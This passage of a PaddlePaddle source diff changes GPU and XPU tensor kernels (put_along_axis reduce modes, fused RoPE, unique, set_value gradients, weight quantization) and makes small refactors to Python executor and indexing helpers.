-        reshaped_indices_v.emplace_back(phi::Cast<int, Context>(
-            dev_ctx, *int_indices_v[i], phi::DataType::INT64));
+        index_tensor = phi::Cast<int, Context>(
+            dev_ctx, *int_indices_v[i], phi::DataType::INT64);
       } else {
-        reshaped_indices_v.emplace_back(*int_indices_v[i]);
+        index_tensor = *int_indices_v[i];
       }
+      tmp_res_indices_v->emplace_back(
+          GetReshapeAndExpandTensor<int64_t, Context>(
+              dev_ctx, index_tensor, res_dim, bd_dim, 0));
     }
-    reshaped_indices_v.insert(
-        reshaped_indices_v.end(), range_tensor_v.begin(), range_tensor_v.end());
-
-    phi::DDim res_dim = common::make_ddim(*res_dim_v);
-
-    for (size_t i = 0; i < reshaped_indices_v.size(); ++i) {
+    for (size_t i = 0; i < range_tensor_v.size(); ++i) {
       tmp_res_indices_v->emplace_back(
           GetReshapeAndExpandTensor<int64_t, Context>(
-              dev_ctx,
-              reshaped_indices_v[i],
-              res_dim,
-              bd_dim,
-              ((i < int_indices_v.size())
-                   ? 0
-                   : i - int_indices_v.size() + len_bd_dim)));
+              dev_ctx, range_tensor_v[i], res_dim, bd_dim, i + len_bd_dim));
     }
     for (size_t i = 0; i < res_indices_v->size(); ++i) {
       (*res_indices_v)[i] = &(*tmp_res_indices_v)[i];
     }
 
   } else {
-    std::vector<DenseTensor> int_indices_v_tmp;
-
     for (size_t i = 0; i < int_indices_v.size(); ++i) {
+      phi::DenseTensor index_tensor;
+      phi::DenseTensor expand_index;
       if (int_indices_v[i]->dtype() == phi::DataType::INT32) {
-        int_indices_v_tmp.emplace_back(phi::Cast<int, Context>(
-            dev_ctx, *int_indices_v[i], phi::DataType::INT64));
+        index_tensor = phi::Cast<int, Context>(
+            dev_ctx, *int_indices_v[i], phi::DataType::INT64);
       } else {
-        int_indices_v_tmp.emplace_back(*int_indices_v[i]);
+        index_tensor = *int_indices_v[i];
       }
-    }
-
-    for (size_t i = 0; i < int_indices_v.size(); ++i) {
       if (bd_dim != int_indices_v[i]->dims()) {
-        tmp_res_indices_v->emplace_back(
-            DenseTensor(phi::DataType::INT64).Resize(bd_dim));
+        expand_index = DenseTensor(phi::DataType::INT64).Resize(bd_dim);
         ExpandKernel<int64_t, Context>(
             dev_ctx,
-            int_indices_v_tmp[i],
+            index_tensor,
             IntArray(common::vectorize<int64_t>(bd_dim)),
-            &(*tmp_res_indices_v)[i]);
+            &expand_index);
       } else {
-        tmp_res_indices_v->emplace_back(int_indices_v_tmp[i]);
+        expand_index = index_tensor;
       }
+      tmp_res_indices_v->emplace_back(expand_index);
     }
-
     for (size_t i = 0; i < res_indices_v->size(); ++i) {
       (*res_indices_v)[i] = &(*tmp_res_indices_v)[i];
     }
diff --git a/paddle/phi/kernels/fusion/gpu/fused_rope_utils.h b/paddle/phi/kernels/fusion/gpu/fused_rope_utils.h
index 972f5ee633bbb0..0db16ffb7e20bc 100644
--- a/paddle/phi/kernels/fusion/gpu/fused_rope_utils.h
+++ b/paddle/phi/kernels/fusion/gpu/fused_rope_utils.h
@@ -125,10 +125,18 @@ __global__ void VectorizedFusedRopeWithRotateEveryTwoKernel(
         MPType p0 = static_cast<MPType>(input[pr_index]);
         MPType p1 = static_cast<MPType>(input[ls_index]);
 
-        result[pr_index] =
-            cos_value[pr_index] * p0 - sign * sin_value[ls_index] * p1;
-        result[ls_index] =
-            cos_value[ls_index] * p1 + sign * sin_value[pr_index] * p0;
+        if (sign == 1) {
+          result[pr_index] = cos_value[pr_index] * p0;
+          result[pr_index] -= sin_value[pr_index] * p1;
+
+          result[ls_index] = sin_value[ls_index] * p0;
+          result[ls_index] += cos_value[ls_index] * p1;
+        } else if (sign == -1) {
+          result[pr_index] =
+              cos_value[pr_index] * p0 + sin_value[ls_index] * p1;
+          result[ls_index] =
+              cos_value[ls_index] * p1 - sin_value[pr_index] * p0;
+        }
 
         store[pr_index] = static_cast<T>(result[pr_index]);
         store[ls_index] = static_cast<T>(result[ls_index]);
diff --git a/paddle/phi/kernels/gpu/cum_maxmin_grad_kernel.cu b/paddle/phi/kernels/gpu/cum_maxmin_grad_kernel.cu
index f8dc67f5bafe88..d7341e55e23490 100644
--- a/paddle/phi/kernels/gpu/cum_maxmin_grad_kernel.cu
+++ b/paddle/phi/kernels/gpu/cum_maxmin_grad_kernel.cu
@@ -39,10 +39,10 @@ void CummaxGradKernel(const Context& dev_ctx,
 
   if (dtype == DataType::INT32) {
     phi::funcs::gpu_scatter_add_kernel<T, int32_t>(
-        *x_grad, axis, indices, out_grad, dev_ctx);
+        *x_grad, axis, indices, out_grad, true, dev_ctx);
   } else if (dtype == DataType::INT64) {
     phi::funcs::gpu_scatter_add_kernel<T, int64_t>(
-        *x_grad, axis, indices, out_grad, dev_ctx);
+        *x_grad, axis, indices, out_grad, true, dev_ctx);
   }
 }
 
@@ -63,10 +63,10 @@ void CumminGradKernel(const Context& dev_ctx,
 
   if (dtype == DataType::INT32) {
     phi::funcs::gpu_scatter_add_kernel<T, int32_t>(
-        *x_grad, axis, indices, out_grad, dev_ctx);
+        *x_grad, axis, indices, out_grad, true, dev_ctx);
   } else if (dtype == DataType::INT64) {
     phi::funcs::gpu_scatter_add_kernel<T, int64_t>(
-        *x_grad, axis, indices, out_grad, dev_ctx);
+        *x_grad, axis, indices, out_grad, true, dev_ctx);
   }
 }
 
diff --git a/paddle/phi/kernels/gpu/put_along_axis_grad_kernel.cu b/paddle/phi/kernels/gpu/put_along_axis_grad_kernel.cu
index d86e0493786ebd..c70812b473ee62 100644
--- a/paddle/phi/kernels/gpu/put_along_axis_grad_kernel.cu
+++ b/paddle/phi/kernels/gpu/put_along_axis_grad_kernel.cu
@@ -27,9 +27,12 @@ template <typename T, typename Context>
 void PutAlongAxisGradKernel(const Context& dev_ctx,
                             const DenseTensor& x,
                             const DenseTensor& index,
+                            const DenseTensor& value,
+                            const DenseTensor& out,
                             const DenseTensor& out_grad,
                             int axis,
                             const std::string& reduce,
+                            bool include_self,
                             DenseTensor* x_grad,
                             DenseTensor* value_grad) {
   PADDLE_ENFORCE_EQ(dev_ctx.GetPlace().GetType() == phi::AllocationType::GPU,
@@ -40,23 +43,118 @@ void PutAlongAxisGradKernel(const Context& dev_ctx,
   const auto& index_type = index.dtype();
   if (x_grad) {
     phi::Copy(dev_ctx, out_grad, dev_ctx.GetPlace(), false, x_grad);
-    if (index_type == DataType::INT32) {
-      phi::funcs::gpu_scatter_input_grad_kernel<T, int32_t>(
-          out_grad, axis, index, *x_grad, dev_ctx);
-    } else {
-      phi::funcs::gpu_scatter_input_grad_kernel<T, int64_t>(
-          out_grad, axis, index, *x_grad, dev_ctx);
+    if (!include_self || reduce == "assign") {
+      if (index_type == DataType::INT32) {
+        phi::funcs::gpu_scatter_input_grad_kernel<T, int32_t>(
+            out_grad, axis, index, *x_grad, include_self, dev_ctx);
+      } else {
+        phi::funcs::gpu_scatter_input_grad_kernel<T, int64_t>(
+            out_grad, axis, index, *x_grad, include_self, dev_ctx);
+      }
+    } else if (reduce == "multiply" || reduce == "mul" || reduce == "amin" ||
+               reduce == "amax") {
+      if (index_type == DataType::INT32) {
+        phi::funcs::gpu_scatter_mul_min_max_input_grad_kernel<T, int32_t>(
+            out_grad,
+            axis,
+            index,
+            out,
+            x,
+            value,
+            *x_grad,
+            reduce,
+            include_self,
+            dev_ctx);
+      } else {
+        phi::funcs::gpu_scatter_mul_min_max_input_grad_kernel<T, int64_t>(
+            out_grad,
+            axis,
+            index,
+            out,
+            x,
+            value,
+            *x_grad,
+            reduce,
+            include_self,
+            dev_ctx);
+      }
+    } else if (reduce == "mean") {
+      if (index_type == DataType::INT32) {
+        phi::funcs::gpu_scatter_mean_input_grad_kernel<T, int32_t>(
+            out_grad, axis, index, *x_grad, include_self, dev_ctx);
+      } else {
+        phi::funcs::gpu_scatter_mean_input_grad_kernel<T, int64_t>(
+            out_grad, axis, index, *x_grad, include_self, dev_ctx);
+      }
     }
   }
   if (value_grad) {
     value_grad->Resize(index.dims());
     dev_ctx.template Alloc<T>(value_grad);
-    if (index_type == DataType::INT32) {
-      phi::funcs::gpu_scatter_value_grad_kernel<T, int32_t>(
-          out_grad, axis, index, *value_grad, dev_ctx);
-    } else {
-      phi::funcs::gpu_scatter_value_grad_kernel<T, int64_t>(
-          out_grad, axis, index, *value_grad, dev_ctx);
+    auto* grad_data = value_grad->data<T>();
+    int64_t grad_size = value_grad->numel();
+    cudaMemset(grad_data, 0, sizeof(T) * grad_size);
+    if (reduce == "assign") {
+      if (index_type == DataType::INT32) {
+        phi::funcs::gpu_scatter_value_grad_kernel<T, int32_t>(
+            out_grad, axis, index, *value_grad, include_self, dev_ctx);
+      } else if (index_type == DataType::INT64) {
+        phi::funcs::gpu_scatter_value_grad_kernel<T, int64_t>(
+            out_grad, axis, index, *value_grad, include_self, dev_ctx);
+      }
+    } else if (reduce == "add" || reduce == "mean") {
+      if (index_type == DataType::INT32) {
+        phi::funcs::gpu_scatter_add_mean_value_grad_kernel<T, int32_t>(
+            out_grad,
+            axis,
+            index,
+            out,
+            x,
+            value,
+            *value_grad,
+            reduce,
+            include_self,
+            dev_ctx);
+      } else {
+        phi::funcs::gpu_scatter_add_mean_value_grad_kernel<T, int64_t>(
+            out_grad,
+            axis,
+            index,
+            out,
+            x,
+            value,
+            *value_grad,
+            reduce,
+            include_self,
+            dev_ctx);
+      }
+    } else if (reduce == "mul" || reduce == "multiply" || reduce == "amin" ||
+               reduce == "amax") {
+      if (index_type == DataType::INT32) {
+        phi::funcs::gpu_scatter_mul_min_max_value_grad_kernel<T, int32_t>(
+            out_grad,
+            axis,
+            index,
+            out,
+            x,
+            value,
+            *value_grad,
+            reduce,
+            include_self,
+            dev_ctx);
+      } else {
+        phi::funcs::gpu_scatter_mul_min_max_value_grad_kernel<T, int64_t>(
+            out_grad,
+            axis,
+            index,
+            out,
+            x,
+            value,
+            *value_grad,
+            reduce,
+            include_self,
+            dev_ctx);
+      }
     }
   }
 }
diff --git a/paddle/phi/kernels/gpu/put_along_axis_kernel.cu b/paddle/phi/kernels/gpu/put_along_axis_kernel.cu
index b63047973e9b82..aff4eec7bff8dd 100644
--- a/paddle/phi/kernels/gpu/put_along_axis_kernel.cu
+++ b/paddle/phi/kernels/gpu/put_along_axis_kernel.cu
@@ -30,6 +30,7 @@ void PutAlongAxisKernel(const Context& dev_ctx,
                         const DenseTensor& value,
                         int axis,
                         const std::string& reduce,
+                        bool include_self,
                         DenseTensor* out) {
   PADDLE_ENFORCE_EQ(dev_ctx.GetPlace().GetType() == phi::AllocationType::GPU,
                     true,
@@ -42,31 +43,56 @@ void PutAlongAxisKernel(const Context& dev_ctx,
   if (reduce == "add") {
     if (index_type == DataType::INT32) {
       phi::funcs::gpu_scatter_add_kernel<T, int32_t>(
-          *out, axis, index, value, dev_ctx);
+          *out, axis, index, value, include_self, dev_ctx);
     } else if (index_type == DataType::INT64) {
       phi::funcs::gpu_scatter_add_kernel<T, int64_t>(
-          *out, axis, index, value, dev_ctx);
+          *out, axis, index, value, include_self, dev_ctx);
     }
   } else if (reduce == "multiply" || reduce == "mul") {
     if (index_type == DataType::INT32) {
       phi::funcs::gpu_scatter_mul_kernel<T, int32_t>(
-          *out, axis, index, value, dev_ctx);
+          *out, axis, index, value, include_self, dev_ctx);
     } else if (index_type == DataType::INT64) {
       phi::funcs::gpu_scatter_mul_kernel<T, int64_t>(
-          *out, axis, index, value, dev_ctx);
+          *out, axis, index, value, include_self, dev_ctx);
     }
   } else if (reduce == "assign") {
     if (index_type == DataType::INT32) {
       phi::funcs::gpu_scatter_assign_kernel<T, int32_t>(
-          *out, axis, index, value, dev_ctx);
+          *out, axis, index, value, include_self, dev_ctx);
     } else if (index_type == DataType::INT64) {
       phi::funcs::gpu_scatter_assign_kernel<T, int64_t>(
-          *out, axis, index, value, dev_ctx);
+          *out, axis, index, value, include_self, dev_ctx);
+    }
+  } else if (reduce == "mean") {
+    if (index_type == DataType::INT32) {
+      phi::funcs::gpu_scatter_mean_kernel<T, int32_t>(
+          *out, axis, index, value, include_self, dev_ctx);
+    } else if (index_type == DataType::INT64) {
+      phi::funcs::gpu_scatter_mean_kernel<T, int64_t>(
+          *out, axis, index, value, include_self, dev_ctx);
+    }
+  } else if (reduce == "amax") {
+    if (index_type == DataType::INT32) {
+      phi::funcs::gpu_scatter_max_kernel<T, int32_t>(
+          *out, axis, index, value, include_self, dev_ctx);
+    } else if (index_type == DataType::INT64) {
+      phi::funcs::gpu_scatter_max_kernel<T, int64_t>(
+          *out, axis, index, value, include_self, dev_ctx);
+    }
+  } else if (reduce == "amin") {
+    if (index_type == DataType::INT32) {
+      phi::funcs::gpu_scatter_min_kernel<T, int32_t>(
+          *out, axis, index, value, include_self, dev_ctx);
+    } else if (index_type == DataType::INT64) {
+      phi::funcs::gpu_scatter_min_kernel<T, int64_t>(
+          *out, axis, index, value, include_self, dev_ctx);
     }
   } else {
     PADDLE_THROW(errors::InvalidArgument(
         "can not support reduce: '%s' for scatter kernel, only "
-        "support reduce op: 'add', 'assign', 'mul' and 'multiply', the "
+        "support reduce op: 'add', 'assign', 'mul', 'mean', 'amin', 'amax' and "
+        "'multiply', the "
         "default reduce op is 'assign' ",
         reduce));
     return;
diff --git a/paddle/phi/kernels/gpu/repeat_interleave_grad_kernel.cu b/paddle/phi/kernels/gpu/repeat_interleave_grad_kernel.cu
index 52a0e313398e8b..5ff1418b2732ad 100644
--- a/paddle/phi/kernels/gpu/repeat_interleave_grad_kernel.cu
+++ b/paddle/phi/kernels/gpu/repeat_interleave_grad_kernel.cu
@@ -25,7 +25,8 @@ PD_REGISTER_KERNEL(repeat_interleave_with_tensor_index_grad,
                    float,
                    double,
                    int,
-                   int64_t) {}
+                   int64_t,
+                   phi::dtype::bfloat16) {}
 PD_REGISTER_KERNEL(repeat_interleave_grad,
                    GPU,
                    ALL_LAYOUT,
@@ -33,4 +34,5 @@ PD_REGISTER_KERNEL(repeat_interleave_grad,
                    float,
                    double,
                    int,
-                   int64_t) {}
+                   int64_t,
+                   phi::dtype::bfloat16) {}
diff --git a/paddle/phi/kernels/gpu/repeat_interleave_kernel.cu b/paddle/phi/kernels/gpu/repeat_interleave_kernel.cu
index ed62278f067e5f..7b0675b3a752df 100644
--- a/paddle/phi/kernels/gpu/repeat_interleave_kernel.cu
+++ b/paddle/phi/kernels/gpu/repeat_interleave_kernel.cu
@@ -25,7 +25,8 @@ PD_REGISTER_KERNEL(repeat_interleave,
                    float,
                    double,
                    int,
-                   int64_t) {}
+                   int64_t,
+                   phi::dtype::bfloat16) {}
 
 PD_REGISTER_KERNEL(repeat_interleave_with_tensor_index,
                    GPU,
@@ -34,4 +35,5 @@ PD_REGISTER_KERNEL(repeat_interleave_with_tensor_index,
                    float,
                    double,
                    int,
-                   int64_t) {}
+                   int64_t,
+                   phi::dtype::bfloat16) {}
diff --git a/paddle/phi/kernels/gpu/set_value_grad_kernel.cu b/paddle/phi/kernels/gpu/set_value_grad_kernel.cu
index 66688b417ae307..42ff5b912eccd0 100644
--- a/paddle/phi/kernels/gpu/set_value_grad_kernel.cu
+++ b/paddle/phi/kernels/gpu/set_value_grad_kernel.cu
@@ -35,3 +35,20 @@ PD_REGISTER_KERNEL(set_value_grad,
                    phi::dtype::bfloat16,
                    phi::dtype::complex<float>,
                    phi::dtype::complex<double>) {}
+
+PD_REGISTER_KERNEL(set_value_with_scalar_grad,
+                   GPU,
+                   ALL_LAYOUT,
+                   phi::SetValueWithScalarGradKernel,
+                   float,
+                   double,
+                   int,
+                   int64_t,
+                   bool,
+                   int16_t,
+                   uint8_t,
+                   int8_t,
+                   phi::dtype::float16,
+                   phi::dtype::bfloat16,
+                   phi::dtype::complex<float>,
+                   phi::dtype::complex<double>) {}
diff --git a/paddle/phi/kernels/gpu/take_along_axis_grad_kernel.cu b/paddle/phi/kernels/gpu/take_along_axis_grad_kernel.cu
index 6cea7592836730..5993b11f638db2 100644
--- a/paddle/phi/kernels/gpu/take_along_axis_grad_kernel.cu
+++ b/paddle/phi/kernels/gpu/take_along_axis_grad_kernel.cu
@@ -46,10 +46,11 @@ void TakeAlongAxisGradKernel(const Context& dev_ctx,
         axis,
         index,
         out_grad,
+        true,
         dev_ctx);  // the gradient of gather is scatter
   } else if (index_type == DataType::INT64) {
     phi::funcs::gpu_scatter_add_kernel<T, int64_t>(
-        *x_grad, axis, index, out_grad, dev_ctx);
+        *x_grad, axis, index, out_grad, true, dev_ctx);
   } else {
     PADDLE_THROW(
         phi::errors::InvalidArgument("The data type of input index is expected "
diff --git a/paddle/phi/kernels/gpu/take_along_axis_kernel.cu b/paddle/phi/kernels/gpu/take_along_axis_kernel.cu
index ba4c6ba27e6824..ea32c056d4016a 100644
--- a/paddle/phi/kernels/gpu/take_along_axis_kernel.cu
+++ b/paddle/phi/kernels/gpu/take_along_axis_kernel.cu
@@ -33,9 +33,11 @@ void TakeAlongAxisKernel(const Context& dev_ctx,
 
   const auto& index_type = index.dtype();
   if (index_type == DataType::INT32) {
-    phi::funcs::gpu_gather_kernel<T, int32_t>(x, axis, index, *out, dev_ctx);
+    phi::funcs::gpu_gather_kernel<T, int32_t>(
+        x, axis, index, *out, true, dev_ctx);
   } else if (index_type == DataType::INT64) {
-    phi::funcs::gpu_gather_kernel<T, int64_t>(x, axis, index, *out, dev_ctx);
+    phi::funcs::gpu_gather_kernel<T, int64_t>(
+        x, axis, index, *out, true, dev_ctx);
   } else {
     PADDLE_THROW(
         phi::errors::InvalidArgument("The data type of input index is expected "
diff --git a/paddle/phi/kernels/gpu/top_p_sampling_kernel.cu b/paddle/phi/kernels/gpu/top_p_sampling_kernel.cu
index 6a4ad710fff0e7..eea67fc676d6df 100644
--- a/paddle/phi/kernels/gpu/top_p_sampling_kernel.cu
+++ b/paddle/phi/kernels/gpu/top_p_sampling_kernel.cu
@@ -303,7 +303,7 @@ __device__ __forceinline__ void BlockReduce(Pair<T> shared_max[],
       if (*beam >= MaxLength) break;
     } else {
 #ifdef PADDLE_WITH_HIP
-      uint64 mask = 0;
+      unsigned mask = 0u;
       mask = __ballot(true);
       if (tid_max / WARP_SIZE == wid) {
         if (__shfl_down(*beam, tid_max % WARP_SIZE, WARP_SIZE) == MaxLength)
diff --git a/paddle/phi/kernels/gpu/unique_kernel.cu b/paddle/phi/kernels/gpu/unique_kernel.cu
index e3c6f1bd4c9ef7..c37c8a820aefa9 100644
--- a/paddle/phi/kernels/gpu/unique_kernel.cu
+++ b/paddle/phi/kernels/gpu/unique_kernel.cu
@@ -26,7 +26,14 @@
 #include <iostream>
 #include <vector>
 
+#ifdef PADDLE_WITH_CUDA
+#include "cub/cub.cuh"
+#elif defined(PADDLE_WITH_MUSA)
 #include "cub/cub.cuh"
+#else
+#include <hipcub/hipcub.hpp>
+namespace cub = hipcub;
+#endif
 #include "paddle/phi/backends/gpu/gpu_context.h"
 #include "paddle/phi/common/memory_utils.h"
 #include "paddle/phi/core/kernel_registry.h"
@@ -170,8 +177,11 @@ UniqueFlattendCUDATensor(const Context& context,
 #elif defined(PADDLE_WITH_MUSA)
     musaMemsetAsync(inv_loc_data_ptr, 0, sizeof(IndexT), context.stream());
 #else
-    cudaMemsetAsync(inv_loc_data_ptr, 0, sizeof(IndexT), context.stream());
+    thrust::device_ptr<IndexT> inv_loc_data_dev(inv_loc_data_ptr);
+    inv_loc_data_dev[0] = 0;  // without device_ptr, segmentation fault
 #endif
+
+#ifdef PADDLE_WITH_HIP
     size_t temp_storage_bytes = 0;
     cub::DeviceScan::InclusiveSum(NULL,
                                   temp_storage_bytes,
@@ -187,6 +197,12 @@ UniqueFlattendCUDATensor(const Context& context,
                                   inv_loc_data_ptr,
                                   num_input,
                                   context.stream());
+#else
+    thrust::inclusive_scan(exec_policy,
+                           inv_loc_data_ptr,
+                           inv_loc_data_ptr + num_input,
+                           inv_loc_data_ptr);
+#endif
     thrust::scatter(exec_policy,
                     inv_loc_data_ptr,
                     inv_loc_data_ptr + num_input,
@@ -390,9 +406,11 @@ static void ComputeUniqueDims(const Context& context,
   // 3. counts: 'counts'
   counts->Resize(common::make_ddim({num_out}));
   auto* count_data = context.template Alloc<IndexT>(counts);
-  thrust::fill(exec_policy, count_data, count_data + row, 0);
-  thrust::adjacent_difference(
-      exec_policy, range_data_ptr + 1, range_data_ptr + row + 1, count_data);
+  thrust::fill(exec_policy, count_data, count_data + num_out, 0);
+  thrust::adjacent_difference(exec_policy,
+                              range_data_ptr + 1,
+                              range_data_ptr + num_out + 1,
+                              count_data);
 }
 
 // Calculate unique when 'axis' is set
diff --git a/paddle/phi/kernels/impl/set_value_grad_kernel_impl.h b/paddle/phi/kernels/impl/set_value_grad_kernel_impl.h
index 3f78361b92b8bd..99f05f80c17ff7 100644
--- a/paddle/phi/kernels/impl/set_value_grad_kernel_impl.h
+++ b/paddle/phi/kernels/impl/set_value_grad_kernel_impl.h
@@ -341,4 +341,26 @@ void SetValueGradKernel(const Context& dev_ctx,
   }
 }
 
+template <typename T, typename Context>
+void SetValueWithScalarGradKernel(const Context& dev_ctx,
+                                  const DenseTensor& out_grad,
+                                  const IntArray& starts,
+                                  const IntArray& ends,
+                                  const IntArray& steps,
+                                  const std::vector<int64_t>& axes,
+                                  const std::vector<int64_t>& decrease_axes,
+                                  const std::vector<int64_t>& none_axes,
+                                  DenseTensor* x_grad) {
+  SetValueGradKernel<T, Context>(dev_ctx,
+                                 out_grad,
+                                 starts,
+                                 ends,
+                                 steps,
+                                 axes,
+                                 decrease_axes,
+                                 none_axes,
+                                 x_grad,
+                                 nullptr);
+}
+
 }  // namespace phi
diff --git a/paddle/phi/kernels/impl/weight_quantize_kernel_gpu_impl.h b/paddle/phi/kernels/impl/weight_quantize_kernel_gpu_impl.h
index 5dafe445e2b461..201dd403270f36 100644
--- a/paddle/phi/kernels/impl/weight_quantize_kernel_gpu_impl.h
+++ b/paddle/phi/kernels/impl/weight_quantize_kernel_gpu_impl.h
@@ -105,6 +105,7 @@ void weight_permute_gpu(const GPUContext& dev_ctx,
         input_data, output_data, numel, total_k, total_n);
   }
 }
+
 template <typename T, int VectorSize = 8>
 __global__ void per_channel_quant_gpu(const T* weight_data,
                                       int8_t* quanted_weight_data,
@@ -160,7 +161,6 @@ __global__ void per_channel_quant_gpu(const T* weight_data,
     }
   }
 }
-
 template <typename T, typename GPUContext>
 void weight_quant_gpu(const GPUContext& dev_ctx,
                       const T* weight_data,
@@ -174,8 +174,15 @@ void weight_quant_gpu(const GPUContext& dev_ctx,
   constexpr int kBlockSize = 64;
   constexpr int kWarpNum = kBlockSize / kWarpSize;
   constexpr int kVectorSize = 128 / sizeof(T) / 8;
+  PADDLE_ENFORCE_EQ(total_n % kVectorSize,
+                    0,
+                    phi::errors::PreconditionNotMet(
+                        "Currently, weight_quant_gpu kernel only support n "
+                        "with multiple of %d, please use",
+                        kVectorSize));
   int vec_total_n = total_n / kVectorSize;
-  int kGridSize = max(vec_total_n / kBlockSize, static_cast<int>(1));
+  int kGridSize =
+      max((vec_total_n + kBlockSize - 1) / kBlockSize, static_cast<int>(1));
   per_channel_quant_gpu<T, kVectorSize><<<kGridSize, kBlockSize>>>(
       weight_data, quanted_weight_data, scale_data, total_k, vec_total_n);
 }
diff --git a/paddle/phi/kernels/put_along_axis_grad_kernel.h b/paddle/phi/kernels/put_along_axis_grad_kernel.h
index 2141443da7ab17..07c39941ce8d83 100644
--- a/paddle/phi/kernels/put_along_axis_grad_kernel.h
+++ b/paddle/phi/kernels/put_along_axis_grad_kernel.h
@@ -24,9 +24,12 @@ template <typename T, typename Context>
 void PutAlongAxisGradKernel(const Context& dev_ctx,
                             const DenseTensor& x,
                             const DenseTensor& index,
+                            const DenseTensor& value,
+                            const DenseTensor& out,
                             const DenseTensor& out_grad,
                             int axis,
                             const std::string& reduce,
+                            bool include_self,
                             DenseTensor* x_grad,
                             DenseTensor* value_grad);
 
diff --git a/paddle/phi/kernels/put_along_axis_kernel.h b/paddle/phi/kernels/put_along_axis_kernel.h
index 797d0e364b48d4..c1cb13e607dd6e 100644
--- a/paddle/phi/kernels/put_along_axis_kernel.h
+++ b/paddle/phi/kernels/put_along_axis_kernel.h
@@ -27,6 +27,7 @@ void PutAlongAxisKernel(const Context& dev_ctx,
                         const DenseTensor& value,
                         int axis,
                         const std::string& reduce,
+                        bool include_self,
                         DenseTensor* out);
 
 }  // namespace phi
diff --git a/paddle/phi/kernels/set_value_grad_kernel.h b/paddle/phi/kernels/set_value_grad_kernel.h
index e4dad683e40a9d..04592cd2002d19 100644
--- a/paddle/phi/kernels/set_value_grad_kernel.h
+++ b/paddle/phi/kernels/set_value_grad_kernel.h
@@ -32,4 +32,14 @@ void SetValueGradKernel(const Context& dev_ctx,
                         DenseTensor* x_grad,
                         DenseTensor* value_grad);
 
+template <typename T, typename Context>
+void SetValueWithScalarGradKernel(const Context& dev_ctx,
+                                  const DenseTensor& out_grad,
+                                  const IntArray& starts,
+                                  const IntArray& ends,
+                                  const IntArray& steps,
+                                  const std::vector<int64_t>& axes,
+                                  const std::vector<int64_t>& decrease_axes,
+                                  const std::vector<int64_t>& none_axes,
+                                  DenseTensor* x_grad);
 }  // namespace phi
diff --git a/paddle/phi/kernels/xpu/set_value_grad_kernel.cc b/paddle/phi/kernels/xpu/set_value_grad_kernel.cc
index d1ad332cd626c5..c5d33ae4ac8d06 100644
--- a/paddle/phi/kernels/xpu/set_value_grad_kernel.cc
+++ b/paddle/phi/kernels/xpu/set_value_grad_kernel.cc
@@ -397,6 +397,28 @@ void SetValueGradKernel(const Context& dev_ctx,
   }
 }
 
+template <typename T, typename Context>
+void SetValueWithScalarGradKernel(const Context& dev_ctx,
+                                  const DenseTensor& out_grad,
+                                  const IntArray& starts,
+                                  const IntArray& ends,
+                                  const IntArray& steps,
+                                  const std::vector<int64_t>& axes,
+                                  const std::vector<int64_t>& decrease_axes,
+                                  const std::vector<int64_t>& none_axes,
+                                  DenseTensor* x_grad) {
+  SetValueGradKernel<T, Context>(dev_ctx,
+                                 out_grad,
+                                 starts,
+                                 ends,
+                                 steps,
+                                 axes,
+                                 decrease_axes,
+                                 none_axes,
+                                 x_grad,
+                                 nullptr);
+}
+
 }  // namespace phi
 
 PD_REGISTER_KERNEL(set_value_grad,
@@ -407,3 +429,12 @@ PD_REGISTER_KERNEL(set_value_grad,
                    phi::dtype::float16,
                    int,
                    int64_t) {}
+
+PD_REGISTER_KERNEL(set_value_with_scalar_grad,
+                   XPU,
+                   ALL_LAYOUT,
+                   phi::SetValueWithScalarGradKernel,
+                   float,
+                   phi::dtype::float16,
+                   int,
+                   int64_t) {}
diff --git a/python/cinn/compiler/expr_executor.py b/python/cinn/compiler/expr_executor.py
index cff9a9d62d7c43..c888be369c3d6e 100644
--- a/python/cinn/compiler/expr_executor.py
+++ b/python/cinn/compiler/expr_executor.py
@@ -81,14 +81,15 @@ def visit(self, node):
             value = exec_func(cls_fields)
         else:
             new_node = node.__class__(**cls_fields)
-            ast.copy_location(new_node, node)
-            new_node = ast.Expression(new_node)
             value = self.exec_expr(new_node)
         return self.save_temp_value(value)
 
     def exec_expr(self, node):
-        if isinstance(node, ast.expr):
-            node = ast.Expression(body=node)
+        assert isinstance(node, ast.expr)
+        if type(node).__name__ == "Constant":
+            return node.value
+
+        node = ast.Expression(node)
         node = ast.fix_missing_locations(node)
         exec = compile(node, filename="<ast>", mode="eval")
         return eval(exec, self.var_table)
diff --git a/python/paddle/base/dygraph/tensor_patch_methods.py b/python/paddle/base/dygraph/tensor_patch_methods.py
index cc12d50a6069f2..7b4c81cfa323d0 100644
--- a/python/paddle/base/dygraph/tensor_patch_methods.py
+++ b/python/paddle/base/dygraph/tensor_patch_methods.py
@@ -876,7 +876,7 @@ def __array__(self, dtype=None):
             array = array.astype(dtype)
         return array
 
-    def pre_deal_index_and_value(self, item, value=None):
+    def pre_deal_index(self, item):
         # since in pybind there is no effiency way to transfer Py_Tuple/Py_List/Py_Range to Tensor
         # we call this function in python level.
         item = list(item) if isinstance(item, tuple) else [item]
@@ -886,17 +886,14 @@ def pre_deal_index_and_value(self, item, value=None):
             elif isinstance(slice_item, range):
                 item[i] = paddle.to_tensor(list(slice_item))
 
-        if value is not None and not isinstance(value, Variable):
-            value = paddle.to_tensor(value, dtype=self.dtype)
-
-        return tuple(item), value
+        return tuple(item)
 
     def __getitem__(self, item):
-        item, _ = pre_deal_index_and_value(self, item)
+        item = pre_deal_index(self, item)
         return self._getitem_dygraph(item)
 
     def __setitem__(self, item, value):
-        item, value = pre_deal_index_and_value(self, item, value)
+        item = pre_deal_index(self, item)
         return self._setitem_dygraph(item, value)
 
     @framework.dygraph_only
diff --git a/python/paddle/base/executor.py b/python/paddle/base/executor.py
index fff2771da14c2f..bb8a4bc7b10ab0 100755
--- a/python/paddle/base/executor.py
+++ b/python/paddle/base/executor.py
@@ -682,7 +682,7 @@ def _get_varname_from_block(block):
     )
 
 
-def _get_program_cache_key(feed, fetch_list):
+def _get_feed_fetch_var_names(feed, fetch_list):
     feed_var_names = []
     if isinstance(feed, dict):
         feed_var_names = list(feed.keys())
@@ -690,7 +690,11 @@ def _get_program_cache_key(feed, fetch_list):
         for i, each in enumerate(feed):
             feed_var_names += list(each.keys())
     fetch_var_names = list(map(_to_name_str, fetch_list))
-    return str(feed_var_names + fetch_var_names)
+    return feed_var_names + fetch_var_names
+
+
+def _get_program_cache_key(feed, fetch_list):
+    return str(_get_feed_fetch_var_names(feed, fetch_list))
 
 
 def _as_lodtensor(data, place, dtype=None):
@@ -1026,7 +1030,7 @@ def _get_program_and_executor(self, cached_data):
 
         if enable_inplace or enable_addto:
             # inplace should skip feed and fetch var
-            skip_var_names = eval(_get_program_cache_key(feed, fetch_list))
